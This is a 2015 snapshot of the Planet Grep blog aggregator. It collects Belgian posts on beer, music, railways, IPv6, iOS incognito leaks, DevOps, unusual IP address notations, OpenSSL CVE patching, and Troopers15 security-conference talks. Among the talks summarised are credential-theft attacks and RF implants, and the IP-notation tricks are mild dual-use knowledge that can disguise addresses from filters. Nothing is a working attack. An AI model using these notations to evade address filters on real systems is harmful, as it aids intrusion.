Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

March 26, 2015

Paul Cobbaut

black beer

There is always room for beer (linky).







Inglorious Quad : excellent !
Oesterstout: excellent !
Embrasse: very good.
Zumbi: excellent !
Barbe Noire: very good.

by Paul Cobbaut (noreply@blogger.com) at March 26, 2015 09:12 PM

Frank Goossens

Music from Our Tube; Bela Lugosi’s dead by lots of guys

Bela Lugosi’s Dead is one of the most famous Bauhaus-tracks and is (according to Wikipedia) often considered as the first gothic rock record to have been released. But here you can see and hear a live version by TV on the Radio, Trent Reznor (Nine Inch Nails) and Bauhaus’ Peter Murphy himself. Great stuff!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 26, 2015 04:05 PM

March 25, 2015

Mattias Geniar

Belgium Leader in IPv6 Adoption

The post Belgium Leader in IPv6 Adoption appeared first on ma.ttias.be.

According to Akamai, at least.

European countries continued to be heavily dominant, taking 8 of the 10 spots. Newcomer Norway, with an 88% quarter-over-quarter jump in IPv6 traffic, pushed France out of the top 10.

Belgium again maintained its clear lead, with 32% of content requests made over IPv6 — more than double the percentage of second-place Germany.

Source: akamai’s [state of the internet] 2014

10 points to Belgium! More than 30% of all requests to Akamai are running over IPv6. That's impressive.

IPv6 Traffic Percentage, Top Countries/Regions

Worldwide, Telenet, Brutele and Belgacom are all present in the top 20.

akamai_ipv6_percentage_provider

IPv6 adoption is really speeding up in Belgium.

The post Belgium Leader in IPv6 Adoption appeared first on ma.ttias.be.

by Mattias Geniar at March 25, 2015 03:45 PM

March 24, 2015

Frank Goossens

iBert droomt; schaf de NMBS af!

een niet zelfrijdende peseroEen mens moet durven dromen! Bert Van Wassenhove deed dat ook en in zijn “Laat ons een begin maken met de ontmanteling van de NMBS” stelt hij dan ook voor om treinen te vervangen door -zoals een innovatie-minnende entrepreneur betaamt- zelfrijdende busjes van Google, Apple, BMW of Tesla.

De kern van zijn betoog (mijn samenvatting, lees het artikel vooral zelf):

De NMBS kost te veel en de reizigers zijn ontevreden door vertragingen en andere problemen. De trein kan onze mobiliteitsproblemen dus blijkbaar niet oplossen. De spoorwegen zijn immers een concept uit de industriële revolutie, want we rijden al lang niet meer met z’n allen naar één kantoorgebouw of fabriek naast een station in Brussel. Vandaag zijn er andere revoluties aan de orde die een oplossing kunnen brengen; zelfrijdende busjes die zoals de Pesero’s in Mexico-city volledig vrije-marktgestuurd reizigers oppikken waar het meeste vraag is.

Ik schreef (een deel van) deze blogpost op de vroege dubbeldekker tussen Lokeren en Brussel. De bezetting: pakweg 1.000 pendelaars. We zijn vanzelfsprekend niet de enige trein die van/ naar Brussel rijdt; cijfers van 2013 geven een dagelijks gemiddelde van 180.000 instappende reizigers in de Brusselse stations en het merendeel daarvan (120.000?) zal er ongetwijfeld tijdens de piekuren moeten op- en op de terugweg weer uitstappen. Volgens andere cijfers telt Brussel in totaal 330.000 pendelaars, die dus met openbaar vervoer of de auto komen. Je moet geen doordachte transport-economische analyses maken om hieruit te besluiten dat een héél grote groep mensen nog steeds en masse “naar één kantoorgebouw of fabriek naast een station in Brussel” moet en dat er zonder de trein dan ook bijna de helft meer auto’s in en rond Brussel zouden rijden. De trein vervoert volgens de cijfers van statbel overigens jaar na jaar meer reizigers, met tussen 1997 en 2010 een stijging van 144 naar 224 miljoen reizigers. Dat kan tellen, als (significante bijdrage aan) het verlichten van het mobiliteitsprobleem? Het nadeel; net zoals het wegverkeer, is de trein tijdens de piekuren oververzadigd en dat zorgt inderdaad voor heel wat problemen.

Met die cijfers van de benodigde (piek-)capaciteit in het achterhoofd lijkt inzetten van al dan niet zelfrijdende Pesero’s dan ook een utopie; 120.000 mensen in Brussel afzetten/ oppikken, gerekend aan een capaciteit van pakweg 10 passagiers per busje, dat geeft al snel 12.000 extra busjes in en rond Brussel tijdens de ochtend- en avondpiek. Indien we, zoals Bert voorstelt, één trein-traject als test zouden vervangen door een vloot aan Pesero’s en dat toepassen op “mijn” lijn (Sint-Niklaas -> Brussel -> Kortrijk), dan zouden alleen al voor het deel-traject tot en met Brussel 100 busjes moeten rijden om de 1.000 pendelaars op het piekuur tot in de hoofdstad te krijgen. Ik weet niet wat U, maar ik zou de impact daarvan op de mobiliteit liever niet in de praktijk testen.

Maar het artikel van Bert is niet zonder verdienste; terwijl 100 pesero’s met die ex-treinreizigers van Sint-Niklaas, Lokeren en Dendermonde het fileprobleem alleen maar erger zouden maken, kunnen diezelfde 100 zelfrijdende busje ook 1000 personenwagens vervangen en dus voor aanzienlijk minder drukte op de weg zorgen. Dat zou nog eens een bijdrage aan de oplossing van het mobiliteitsprobleem zijn!

Blijft het probleem van grote groepen mensen die op ongeveer hetzelfde moment op ongeveer dezelfde plaats moeten zijn en daar komen we bij de droom die Bert al als realiteit ziet; wat als we inderdaad niet meer met z’n allen naar één kantoorgebouw of fabriek naast een station in Brussel zouden moeten komen? Want (nog) meer thuis, decentraal of lokaal werken is inderdaad de enige fundamentele oplossing voor de capaciteitsproblemen tijdens de piekuren van zowel de auto- als spoorwegen. Hoe kunnen we grote en kleinere bedrijven en hun werknemers daarvan overtuigen? Misschien is dat juist Bert zijn ultieme bedoeling; het probleem erger maken door de spoorwegen af te schaffen om zo een mentaliteitswijziging af te dwingen? Een sluwe dromer, die iBert!

by frank at March 24, 2015 06:18 AM

March 23, 2015

Mattias Geniar

When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay

The post When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay appeared first on ma.ttias.be.

Private Browsing: the illusion of privacy.

This applies to mobile devices that use iOS (iPhone, iPad). They have have a peculiar way of handling a "private" session.

chrome_incognito_browsing

Shared HTML5 Storage

It's actually explained in the incognito FAQ, but HTML5 storage on those iOS devices have a shared state. Everything stored in HTML5 storage in Incognito Mode can be accessed in normal mode.

... regular and incognito mode tabs share HTML5 local storage in iOS devices. HTML5 websites can access their data about your visit in this storage area.

Source: Browse in private

This mostly shows when websites use the HTML5 local storage for searchbox completion or store the session state of games. In most common use cases, you won't notice. Mainly because HTML5 Local Storage isn't that widely adopted yet.

AirPlay Cache

Apple devices have the ability to use AirPlay to stream audio and video to a remote receiver, like a stereo (Airport Express) or a TV (Apple TV).

When you start such a session in Incognito Mode and stream your audio or video, and later close that session, the Airplay cache will still hold the filename/title of the media item you most recently played.

For instance, if you play Psy's Gangnam Style on an iOS device in Incognito mode, close the tab and continue browsing in Regular Mode, the Airplay info screen will still show you the filename/title of the movie last played.

ios_incognito_bug_airplay_1_1

This meta info of the media played is only removed after you forcefully close the browser.

ios_incognito_bug_airplay_2

Closing the tab isn't enough. This meta info will also be broadcast to any remote device you have connected, be it an Apple TV, Airport Express or in-car entertainment that syncs with AirPlay.

It Could Be Worse

Sure, it's not as bad as storing Incognito URLs in a plain DB file like Safari does, but it just goes to show: Incognito Mode isn't really incognito. It's perfect for testing websites in a fresh environment though.

Regardless of server-side user matching, man-in-the-middle proxies and network sniffers, even local devices can't separate regular vs incognito mode properly. Don't use Incognito Mode for anything you don't want people to know. Expect, one day, to see your Incognito Browsing habbits to be made public.

Make sure you don't have to be (too) ashamed.

The post When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay appeared first on ma.ttias.be.

by Mattias Geniar at March 23, 2015 09:10 PM

March 22, 2015

Mattias Geniar

Life Without Ops

The post Life Without Ops appeared first on ma.ttias.be.

Have you ever done a Puppet run with the --noop option? It does what the name implies: nothing.

Use 'noop' mode where the daemon runs in a no-op or dry-run mode. This is useful for seeing what changes Puppet will make without actually executing the changes.

This is exactly what happens if you have no Ops. Nothing.

Startup Mentality

Not everyone is the same. Neither is every startup. However, I see more and more startups misinterpreting what DevOps is all about. They are publicly looking to hire Developers with a bit of sysadmin knowledge, and expect that to be DevOps.

That's like asking a carpenter to also fix your leaky plumbing.

DevOps isn't about developers doing your system administration. Neither is it letting your sysadmins perform development related tasks. You can have the DevOps spirit and still have those 2 perfectly defined job roles.

DevOps however preaches communication. Breaking silo's. Having Dev and Ops work together. Learning from each other. Complementing each other. Not doing each other's work.

Why Ops Exist

It's so easy to implement some complex Puppet modules and have them working. But do you know what you're doing? What happens when your downloaded modules fail on you, and a few months in your ElasticSearch suddenly breaks? Of you've reached the limits of your MongoDB setup? Or you suddenly realise Redis is singlethreaded?

This is what Ops are for. They've fought the battle. They know what the bottlenecks are, because they've experienced them. Server-side. They know what happens to the network, the disk I/O, the memory and the CPU cycles whenever you reindex your SOLR cores.

This isn't knowledge to take for granted. You can't expect a fulltime developer, with basic knowledge of systems administration, to have the same level of experience. And maybe you don't expect it. Maybe it's OK in the first few months.

But here's my plea I'm hoping you'll understand: go take advice from experienced system administrators. Find someone with battle scars, that's walked the walk. If you can't find it in-house, consider outsourcing. Or plain one-off consultancy.

There's a reason Ops exist. It isn't to cost you money, it's to help you save money in the long run.

The post Life Without Ops appeared first on ma.ttias.be.

by Mattias Geniar at March 22, 2015 08:11 PM

Silly Little IP Tricks

The post Silly Little IP Tricks appeared first on ma.ttias.be.

I'll show you a few things you can do with IP addresses you may not know yet. They aren't new -- just part of the RFC -- but you don't encounter them that often.

Octal values

For instance, did you know that if you prefix an IP address with 0's, they get treated like Octal values? Spot the conversion in the ping below.

$ ping 193.239.211.036
PING 193.239.211.036 (193.239.211.30): 56 data bytes
Request timeout for icmp_seq 0
...

You would've expected the ping request to go to the IP ending in .36, instead if went to .30. Why? Because 036 is actually the octal value for the decimal 30.

Straight Up Integers

IP addresses are formed out of binary sequences, we know this. The binary forms get translate to decimals, for readability.

$ ping 3253719844
PING 3253719844 (193.239.211.36): 56 data bytes
64 bytes from 193.239.211.36: icmp_seq=0 ttl=57 time=17.003 ms
...

Pinging to an integer, like 3253719844, actually works. In the background, it's converted to the real IP notation of 193.239.211.36.

Let's Hex It

You probably saw this coming. If you can ping the integer notation of an IP, would the HEX value work?

$ ping 0xC1EFD324
PING 0xC1EFD324 (193.239.211.36): 56 data bytes
64 bytes from 193.239.211.36: icmp_seq=0 ttl=57 time=18.277 ms
...

Yup!

Skipping A Dot

A great addition thanks to Petru's comment, is to skip a digit in the IP address.

$ ping 4.8
PING 4.8 (4.0.0.8): 56 data bytes
64 bytes from 4.0.0.8: icmp_seq=0 ttl=48 time=156.139 ms
...

The last digit-group is treated as the remainder of the values, so ping 4.8 actually expands to ping 4.0.0.8, because the digit '8' is treated like a 48bit 24bit integer.

If you ever want to have fun with a junior colleague, think of these examples. Especially the octal values are very easy to miss, if you place the leading zeros somewhere in the middle.

Oh and if you decide to test these examples, you'll be pinging one of our nameservers. No harm, feel free to.

The post Silly Little IP Tricks appeared first on ma.ttias.be.

by Mattias Geniar at March 22, 2015 07:45 PM

March 19, 2015

Xavier Mertens

Troopers15 Wrap-Up Day #2

Troopers VenueThis is my wrap-up for the second day of Troopers15. Before the review of the talks, a few words about the conference. The venue is really nice as well as the facilities. A good WiFi coverage (IPv4/IPv6) and even a dedicated GSM network! “Troopers” SIM card were available for free at the reception desk. Besides the classic activities, a charity auction was also organized to help organizations to realize projects around the Internet like installing a satellite link in a refugee camp.

The second keynote was assigned to Sergey Bratus, Research Assistant Processor at Dartmouth College. Sergey is an amazing speaker! His keynote title was “My favourite things”.

Sergey on stage

Sergey explained via multiple examples how we are facing impossible problems against we cannot fight: The fact of hard vs (probably) impossible. Examples: Hard is flight and impossible is the perpetual motion. Computer programs rely on inputs. A classic path is:

input -> processing -> output.

And, nothing new, we cannot trust inputs. The idea presented by Sergey is to clearly split the analyse of inputs and processing. To sanitise inputs, we need to parse the data but writing parsers is very difficult. As he said: “Parsers is like crypto, don’t write them by yourself”. He demonstrated how some quick patches in popular applications (Apache, NGinx) are stupid checks and could be avoided by writing correct parsers of data. Other examples were reviewed:

The Heartbleed bug

Sergey recommended a parser called Hammer. You must have a bright line between the input stream & validation and the processing (malloc(), memcpy()). The final tip provided by Sergey was: Simplify the inputs, use a grammar and keep it simple.

For the talks, my first choice was to go to the “defence” track where Friedwart Kuhn presented “How to Efficiently Protect Active Directory from Credential Theft & Large Scale Compromise”. It was based on a real-world expertise. Microsoft is present in almost every company network with its ActiveDirectory architecture. The first question asked by Friedwart was: “Do you think that you/your AD is safe?”.

Do you think you are protected?

For a while, ActiveDirectory infrastructures have been targeted by multiple attacks: Pass-the-Hash, Golden Tickets, etc. I liked the comparison with Terminator-2 who can impersonate anybody and bypass security controls. Stolen credentials remain a major threat today. To explain how the authentication processes work in the Windows operating systems would require much more than a 1-hour talk but Friedwart made a good compilation of the most common terms and protocols (the LSASS process, NTLM, Kerberos, etc). Keep in mind that for most versions of the Microsoft OS, data are still stored in memory which makes them readable by many tools (like mimikatz). Friedwart also insisted in the fact that other operating systems are vulnerable too. Ubuntu stores the Kerberos tickets in temporary files. And the root account can access all of them. After this introduction (with a white-hat), Friedwart switched to the black-hat side and explained how easy it is to look at credentials theft & reuse. He explained what is the “pass-the-hash” attack and the “Golden Ticket” attack. He made a live demo and created a Golden ticket valid for ten years(!).

Finally, Friedwart explained how to mitigate such attacks. He split the response in two slides. One for the management based on three major steps:

The good news: this does not require huge investments! The other slides explained mitigation techniques from a technical point of view. The idea is to design and implement in 3 tiers: DC / Servers / Workstations. You also need to separate stuff and use the ESAE forest (a service offered by Microsoft).  To mitigate attacks, there is not much to do if you already implemented the above requirements. A last tip: Reset the KRBTGT account on a regular basic and of course… monitor your logs!

My second choice was about CVE-2011-2461. Luca Carettoni and Mauro Gentile. Adobe Flex (now Apache Flex since 2011) is an open source SDK to build SWF files. It provides a lot to fools and classes to develop interactive apps. Starting from Flex V3 apps support dynamic localization (multiple languages). This can be done at compilation time or dynamically using a component called Resource Module. It allows to change text labels without recompiling the app. Resource pre-loading by passing FlashVars in the HTML wrapper. SOP is available in Adobe plug-ins. (Same Origin Policy).  What if a malicious web page can ask Flex apps to load arbitrary resource modules? This is CVE-2011-2461.

CVE-2011-2461

Some exploitation scenarios?

They performed life demo of the vulnerability. To conclude:

The last question was: Are they application still vulnerable? Four years later? Yes of course! To identify such application, the speakers developed a cool called ParrotNG. It can be used from the command line or, even more powerful, as a BurpSuite plug-in. Finally, keep in mind that all files must be patched and the player does not help. Suggestion to Adobe: implement checks into the player to block vulnerable applications.

After the lunch, Martijn Grooten, from Virus Bulletin, presented “The stat of email in 2015”. More precisely, the talk was how to fight against spam which remains a major issue today. Everybody uses email for years. It did not change since the 90’s. One fact: Alice can send a mail to Bob without prior permission, this is called “unsolicited mail” (spam). To cancel spam, email must be redesigned!

Martijn on stage

Then came spam filters… content based and filters but, still today, it remains a cat & mouse game. Spammers realised that they can be someone else and use bots. So, how to mitigate the spam problem?

What is SPF (Sender Policy Framework)? Think about asking via DNS requests if an IP address can send emails for a domain. DMARC is a mix of SPF/DKIM. The status today is that spam is fairly well mitigated. Note that current anti-spam infrastructure remains vulnerable to big changes. Then, IPv6 came and change the landscape! Good news and bad news: Email runs properly on IPv6 (layer 7) but… spam filters makes heavy uses of … IPv4… Why not keep them on IPv4? We don’t need so many IPv6 servers…Can’t stop IPv6 deployment… Solutions? Adapt blacklists to IPv6?

Then Martijn, switched to the next big issue with emails, privacy! In email, there was the before and post-Snowden era… Encryption is popular but… if mails are sent to the 1st smtp hop using TLS, what about the other relays? PGP to the rescue! PGP is not easy no scalable and leaks a lot of metadata! A few words about DIME (Dark Internet Mail Environment) Encrypted + very low amount of metadata. DMTP is an extension of SMTP. DIME has been written by people who understand email. It integrates smoothly into email and allows users to place trust in servers (webmail). Users don’t need to understand crypto! Can we be optimistic? We have collectively shown that we’re very good at fighting spam. DIME includes various levels of security and trust. Spam filters can be integrated into those.

The next talk was “Weapons of Mass Distraction – Sock Puppetry for Fun & Profit” by Marco Slaviero and Azhr Desai. I was also curious about the title that’s why I deduced to attend their presentation.

Sock Puppet

Internet being a media, it was already disconnected from times to times by governments (ex: Egypt, Tunisia). But instead of stupidly cutting down the Internet, the same governments found that it can also be used to control their citizens. UGC (“User Generated Content”) became more and more important across the last years. Everybody can generate some content on blogs, social network. UGC is the new paradigm. How will the government censorship handle UGC? Censorship 2.0 is profoundly important. With such amount of data created online, how can we affect the way they receive attention from people. The research made by Marco and Azhr is based on sock puppets. What is a sock puppet? Here is the Wikipedia definition: A sock puppet is an online identify used for purposes of deception. The questions posed by the speakers were:

The challenge is to measure efficiency of your increase/decrease of attention? How to divert the attention of your readers? They reviewed multiple ways to share information and applied different scenarios:

It was very interesting to see how people will react differently to a message if it is posted alone or a new message with several replies. Is there real sock puppet in the wild? Yes, this happens. How to attract them? Use hot topics or controversial. The analysed the relation between the registration times and the posted comments time. The suck puppet army is really active on the following forums: CNN & AJ English and Jerusalem Post. They used https://disqus.com/ to achieve this. What are the topics?
But who’s behind this army? They have no idea. The conclusion to this talk: all UGC sites have been trivial to manipulate!

Finally, the latest talk was “Wallstreet of Windows Binaries” by Marion Marschalek and Joseph Moti. For a while bugs have names, logos, websites. They have better documentation that before because today it’s cool to find a bug! Researchers need their 5-mins of fame.

Marion on stage

Moti explained why the 0-day business is very close to the trading rules:

Finding a 0-day is like having a stock: you have to value it, you can sell it, you can trade it with another 0-day. How to value a 0-day: IPO (Initial Public Offering). Value depends on the market. The market decides of the value not the developer! Insider trading? Prohibited… if you are working for the target and have access to sources/tools/docs. Buy and sell the same 0-day multiple times? Exclusive vs shared sale. Where do you trade? O-day? white or black market. White : ZDI, I-defense, black? more money! If you go to the black market, you need a broker who will take it, valuate and search for customers (with a percentage as commission). Windows vulnerability API/keyword. as companies have code: ex: GradientFill -> Fill.

Finding vulnerabilities by rating functions? Marion’s tool is called “Wallstreet”. Data analytics for cheap people: Marion showed a picture with sheep, one of them being black. How to separate the black sheep from others?

  1. Problem: Find Frank the black sheep
  2. Attributes: Hair length, color
  3. Attributes evaluation: Sound won’t work
  4. Fine graining: 2 colors only
  5. Magic: SELECT * FROM … WHERE color=‘black’

The tool is based on:

The presentation ended with a demo how to find which process load a specific DLL which could lead to a compromized system.

It’s already over for me. I drove immediately back to Belgium after the last talk. First amazing experience with TROOPERS! Thanks to the crew and particularly to Enno to welcome me.

by Xavier at March 19, 2015 10:34 PM

Mattias Geniar

OpenSSL CVE-2015-0291 and CVE-2015-0286

The post OpenSSL CVE-2015-0291 and CVE-2015-0286 appeared first on ma.ttias.be.

As announced, OpenSSL releases a patch to a high severity vulnerability in the library.

For OpenSSL v1.0.2, this is the Denial of Service CVE.

Changes between 1.0.2 and 1.0.2a [19 Mar 2015]

*) ClientHello sigalgs DoS fix

If a client connects to an OpenSSL 1.0.2 server and renegotiates with an
invalid signature algorithms extension a NULL pointer dereference will
occur. This can be exploited in a DoS attack against the server.

This issue was was reported to OpenSSL by David Ramos of Stanford
University.
(CVE-2015-0291)
[Stephen Henson and Matt Caswell]
OpenSSL 1.0.2 release notes

For OpenSSL v1.0.1 and v1.0.0 and v0.9.8, it's this one (also a Denial of Service).

Changes between 1.0.1l and 1.0.1m [19 Mar 2015]
Changes between 1.0.0q and 1.0.0r [19 Mar 2015]
Changes between 0.9.8ze and 0.9.8zf [19 Mar 2015]

*) Segmentation fault in ASN1_TYPE_cmp fix

The function ASN1_TYPE_cmp will crash with an invalid read if an attempt is
made to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check
certificate signature algorithm consistency this can be used to crash any
certificate verification operation and exploited in a DoS attack. Any
application which performs certificate verification is vulnerable including
OpenSSL clients and servers which enable client authentication.
(CVE-2015-0286)
[Stephen Henson]
OpenSSL 1.0.1 release notes -- OpenSSL 1.0.0 release notes -- OpenSSL 0.9.8

So it's upgrade time again, although the impacted systems could be a relatively small subset of your servers. However, if you're vulnerable, you may want to give this some priority.

The patch (the actual changed code) to the v1.0.2 vulnerability is like this.

OpenSSL CVE 2015 0291

Full commit is here: 34e3edbf3a10953cb407288101fd56a629af22f9.

The 0.9.8, 1.0.0 and 1.0.1 patches are much smaller, but have the same DoS effect.

openssl_CVE-2015-0286

Full commit is here: 02758836731658381580e282ff403ba07d87b2f8.

The feared Denial of Service attack is, unfortunately, not limited to OpenSSL v1.0.2, as was anticipated. It affects v1.0.1 and v1.0.0 and v0.9.8 as well.

Responsible Disclosure

Announcing these kind of patches in advance, even without publishing the details of the patch or the CVE, will surely attract the attention of some bad guys as well. You can be sure they were awaiting the release and are now working on ways to make use of it.

Having said that, this kind of responsible disclosure is of the best kind: everyone knows in advance to reserve (human) resources in order to deal with the problem. OpenSSL did it right for 90%. The remaining 10% would have been deserved if they had bothered to securely and discretely update LibreSSL of this issue, so they could prepare patches on their end as well.

Update: OpenSSL did inform the LibreSSL team of this vulnerability. A well-deserved 100% score for this responsibly disclosed vulnerability.

How to patch

As usual with OpenSSL patches, it's a 2-step fix. First, update the library on your OS.

$ yum update openssl

or

$ apt-get update
$ apt-get install openssl

Then, find all services that depend on the OpenSSL libraries, and restart them.

$ lsof | grep libssl | awk '{print $1}' | sort | uniq

Since the attack is a remote DoS, you should restart the public facing services as soon as possible. The internal services could be done at a later, more convenient, time.

Note: local system users may still be able to exploit those internal services, but it's another requirement in the whole exploit. Short-term, attackers will aim for the low hanging fruit: externally available services.

Long-term Library Fixes

Every time something like this happens, either in OpenSSL or in glibc, I keep thinking about mapping these library dependencies in config management.

Maybe some day, I'll make a proof of concept for this. And some day, it'll save me a few hours of work, for every emergency patch that comes out. Some day.

The post OpenSSL CVE-2015-0291 and CVE-2015-0286 appeared first on ma.ttias.be.

by Mattias Geniar at March 19, 2015 02:24 PM

Joram Barrez

Interview about Activiti on Software Engineering Radio

My good friend Josh Long did an interview with me about Activiti and Business Process Management in general. I must admit, I was quite nervous before the recording, as I had never done a podcast before (note : the editors at SE radio did a really great job ). Here’s the link: http://www.se-radio.net/2015/03/episode-223-joram-barrez-on-the-activiti-business-process-management-platform/ All feedback, as always, […]

by Joram Barrez at March 19, 2015 11:23 AM

March 18, 2015

Xavier Mertens

Troopers15 Wrap-Up Day #1

Troppers 15This is my first Troopers conference. I already heard lot of positive comments about this event but I never attended it. As I’ll start a new job position soon, I had the opportunity to take some days off to join Heidelberg in Germany. The conference is split across two days and three tracks: “attack & research”, “defence & management” and a special one dedicated to the security of SAP. Honestly, I’m not working with SAP environments so I decided to not follow the last track. The core organizer, Enno Rey, made a funny introduction speech and gave some numbers about the 2015 edition: 73 speakers, 160 people from the industry and 51 students (fresh blood). A key message for the conference is to not see speakers as super-stars. Don’t be afraid to talk to them and share!

The first day started classically with a keynote presented by Haroon Meer, the founder of Thinkst, an applied research company with a deep focus on information security. The title was “The hard thing about the hard thing”.

Haroon on stage

It’s a fact: Doing security is pretty hard. Harmon cited a tweet: “If our industry is so broken, why don’t you leave and become a truck driver”. For him, (un)fortunately, we don’t have to convince people anymore that security is important. We have to focus on the bug problem and not on secure engineering. Another interesting quote was: “We don’t have a malware problem, we have an adversary problem”. Harmon reviewed three key components which directly affect security:

What about complexity? Networks of the future (today?) will become complex and complex and difficult to manage from a security point of view. As an example, Haroon cited the Linux kernel and the Chrome browser. The code is maintained by thousands of developers and has millions of code. Think about this when you just browser a website! It became so complex that sometimes we loose the control and how to protect something that we don’t understand? In a composite system, there is no critical gate, everything is a gate. We are bad at writing safe code. Microsoft spent millions of dollars to improve code for years and today IE still suffers of many vulnerabilities (in the last Microsoft security bulletin of February 2015, many patches were released for Internet Explorer!). Shellshock is a very example of composite system. Another example: the black phone. Mark Dowd found a bug in the messaging application. Based on software quality checks, we better defend our network with PowerPoint than with a CheckPoint firewall (quote from FX). The market is also a source of problems. Incentives are part of the business failure. Managers get promoted by shipping new software all the time. Check out how many operating systems and versions you used since you’re working with computers. Even if some companies suffered of giant breaches, this did not affect their value or their customers. In organisations, it’s difficult to evaluate risks. To correctly evaluate them, you must know what can happen. Not easy! Remember: “You can’t buy security!”. Haroon gave many other examples which prove that we are at an inflection point with hard problems to be solved. A very nice keynote!

For the first talk, my choice was to follow Arrigo Triulzi who presented “Pneumonia, Shardan, Antibiotics and Nasty MOVs: a dead hand’s tale”. A curious title! Arrigo was not able to travel from Switzerland to Heidelberg and gave his presentation via a Webex. From a technical point of view, it was perfect, I must confess that it’s not the same as seeing the speaker in real life even if Arrigo started with a joke: “I’m not a Snowden”.

Webex

The talk started with a review of all technologies used during the cold war with nuclear weapons. For a long time, attackers use the “decapitation attack” to take out the C&C. To avoid this, defenders developed countermeasures to not loose the control if the C&C is compromized. As analogy with the infosec field, Arrigo explained that a SOC in a big company may become blind of the deployed sensors are killed. Back to the modern world, Arrigo explained how he successfully changed the microcode of processors. The biggest issue was the persistence. If the CPU is power cycled, the changes are gone. To prevent this, he explained step by step how he added persistence using, i.e. nicssh, another project used to run a SSH daemon in a NIC firmware. If the idea of the talk was interesting, I had some difficulties to follow Arrigo’s ideas, maybe due to the webex?

Then, I switched to the second track with “Game over, does the CISO get an extra life?” presented by Richard Rushing, CISO of Motorola Mobility. The Richard’s idea was interesting: He compared the daily life of a CISO to a modern online game. He started with some facts called “Security camping”;

Richard on stage

A game focuses is on the player, but security focus is on the attack surface. Think about the “shark in the water” : never use terms like “theoretical”. A good quote: “What is the difference between theoretical and practical? A few lines of code!”. The next comparison was based on grinding or farming: What we do, what we hate in our job. Automatisation is good but we can’t buy a solution. According to Richard, we must build it because all structures are different. Then came the lagging… So important in games but also in security. People also lag. Keep in mind that we can get pwned by a 10y-old kid. We need good IR process, vulnerability reports. The time is critical! The next analogy with games was the multi-players aspect. Security is a team sport. Everybody listens and comments. Especially if you have processed like incident response. Bring people that can make decisions. What about “power levelling”? Use known strategies to level faster, learn from friends, strangers and old-guys? What about newbies or noobs in security? Use them even if it is for cannon fodder. Like games, security can have glitches: we need patches. And Richard gave more examples. IOC’s can be compared to easter-eggs in software (hidden messages). And what about the final boss in games? The problem with security is that it’s a never over game. A good talk with nice analogies to the gaming world.

After a lunch break, I moved back to the attack and defence side. Michael Ossmann presented “RF Retroreflectors, Emission Security and SDR”. This was the best talk of the day IMHO. The goal was to explain then demonstrate a retroreflector attack. The principle is based on an attacker -> target -> implant -> radar. It really acts like a classic radar, listening for returned data.

Michael on stage

In such attack, the implant is very important. Note that attackers can also benefit from unintentional emissions like screens. The first implant in the history was the “thing” (The great seal bug). It was very simple, required no battery, can run for years and very difficult to detect. Between the Thing and the ANT catalog, 53 years… What happened during this period? There is no real study, only rumors and speculations. So, to listen to the data returned by the implant, you need a “radar”. Michael started to play with old police radar but it was not very effective. Later he found a game radar from Hotwheels which was good enough.

Hot-Wheels Radar

He explained the lab that he deployed, based on two HackRFOne, one for emitting and one for reception data). They act as a sound card using a microphone and speakers. Instead of classic antennas, Michael used coffee cans. The implant he developed was very simple and called the “Congaflock”. If this one is easy to hide into a cable or a keyboard, he quickly developed a new mode with PS/2 connector (more convenient). He made a live demo and captured some key press on the keyboard.

Gimme a "Q"

The next device which was presented is the “Salsaflock” which listen for VGA signals. Michael explained how screenshots can be captured using… The Gimp!

VGA data in Gimp

More details are available here.

Then Gabriel Barbosa and Rodrigo Branco talked about “Modern platform-supported rootkits”. Why this talk? They are working at Intel and they had to follow mandatory trainings. But they had ideas to attack systems in different ways.

Intel guys on stage

This talk was the result to their research. The biggest problem is assumption. People assume that a system behaves in a specific way. This is wrong! It is programmed to behave like this. A malware will change the way a system works.The current challenges for modern rootlets are: OS dependency, security mechanisms and the different model of computers. Gabriel and Rodrigo reviewed many examples of system abuse. It was really technical and hard to follow for me.

After the afternoon coffee break, “Defender Economics” was presented by Andreas Lindh. The goal of this talk was to understand attackers, their capabilities and their constraints. Yes, they also have constraints! Because if was a defensive talk, the goal was to use this to improve our defences. Two facts: An attacker only need to find one way to hit his target.  But a skilled and motivated attacker will always find a way.

Defenders economics

We must keep in mind that attackers are evolving and we can’t protect against everything. A good point is that attackers don’t have unlimited resources. Do you really need to protect against everything? Not sure. Attackers also have bosses and budgets. They also use basic maths: if the cost of an attack is less than the value of the information to attack, go for it!. The attacker’s economics are:

And for the defenders:

Attackers can be profiles. What are their motivations, resources and procedures? Motivation behind the attack and level of motivation per tatted. What about resources? People and skills, tools and infrastructure or the supply chain. Regarding the procedures, what are the attack vectors, post exploitation activities and flexibility. Andreas explained this by comparing two scenarios:

The company X has multiple solutions to reduce the risks:

Keep in mind that we do not fight the armor but the man inside. Security is hard but:

Another good talk with good examples!

The day ended with some lightning talks. I really liked the one about virtual machine introspection & DRAKVUF. This is a dynamic malware analysis system which does not work as the other ones. Why focus on WMI? In-guest agents are easy to detect and vulnerable to rootkits. So, we need to move the security outside the VM. Quick presentation of a nice tool to perform malware analysis. Have a look at it.

The first day was closed with the social event in a typical German restaurant. As usual, good food, beers and very interesting chats. For a first day, I’m really happy with the organization: nice venue, stable WiFi, SIM card available with a dedicated mobile network (I did not trust it ;-), good food, lot of Club-Mate. I’m looking forward the second day!

Social Event

by Xavier at March 18, 2015 10:56 PM

Frank Goossens

Music from Our Tube: Andy Schauf – You’re out wasting

Andy Shauf is a Canadian songwriter and below “You’re out wasting” is a song of his third albumThe Bearer of Bad News“. Well worth the listen to if you’re in a somewhat quiet(er) mood.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 18, 2015 04:23 PM

March 17, 2015

Xavier Mertens

The lack of network documentation…

[This blogpost has also been published as a guest diary on isc.sans.org]

Document All Things

Writing documentation is a pain for most of us but… mandatory! Pentesters and auditors don’t like to write their reports once the funny stuff has been completed. It is the same for the developers. Writing code and developing new products is fun but good documentation is often missing. By documentation, I mean “network” documentation. Why?

When you buy from a key player some software or hardware which will be connected to a corporate environment, the documentation usually contains a clear description of the network requirements. They could be:

